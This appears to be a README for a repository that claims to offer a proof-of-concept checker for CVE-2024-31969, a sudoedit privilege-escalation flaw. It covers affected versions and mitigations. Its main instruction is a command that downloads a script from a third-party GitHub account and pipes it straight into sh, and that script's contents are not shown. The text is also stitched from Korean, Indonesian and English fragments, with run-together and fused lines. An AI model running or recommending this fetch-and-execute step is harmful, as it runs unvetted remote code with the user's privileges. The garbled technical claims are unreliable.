
CVE-2024-31969에 대한 개념 증명(PoC) 확인 스크립트와 문서를 제공하며, 이는 sudo의 sudoedit에서 발생하는 로컬 권한 상승 취약점으로, 영향을 받는 버전과 완화 지침을 포함합니다.
CVE-2024-31969 adalah kerentanan local privilege escalation pada sudo ketika menggunakan perintah sudoedit.
Kerentanan ini diperkenalkan sejak sudo 1.9.0 karena cara sudoedit memvalidasi environment variable pengguna dan kepemilikan file yang kurang tepat.
A flaw introduced in sudo 1.9.0 in how
sudoeditvalidated users' environment variables and file ownership.
Kerentanan ini memungkinkan user lokal dengan akses sudoedit untuk memodifikasi file arbitrary sebagai root melalui manipulasi environment variable seperti SUDO_EDITOR, atau dengan memanfaatkan symlink.
| Versi Sudo | Status |
|---|---|
| 1.9.0 → 1.9.15p4 | 🔥 Rentan |
| 1.9.15p5 ke atas | ✅ Aman |
| 1.8.x (termasuk 1.8.23) | ❌ Tidak terdampak |
Jalankan perintah berikut:
curl -L https://raw.githubusercontent.com/kingfakee7/CVE-2024-31969/main/cve-2024-31969-check.sh | sh
sudo ke versi 1.9.15p5 atau yang lebih baru.sudoers yang memperbolehkan sudoedit untuk user non-root.env_keep atau env_reset yang aman dalam file /etc/sudoers.Repository ini dibuat untuk tujuan edukasi dan dokumentasi keamanan sistem.
Dilarang keras menggunakan informasi ini untuk aktivitas ilegal atau tanpa izin tertulis dari pemilik sistem.
Segala bentuk penyalahgunaan sepenuhnya di luar tanggung jawab pembuat.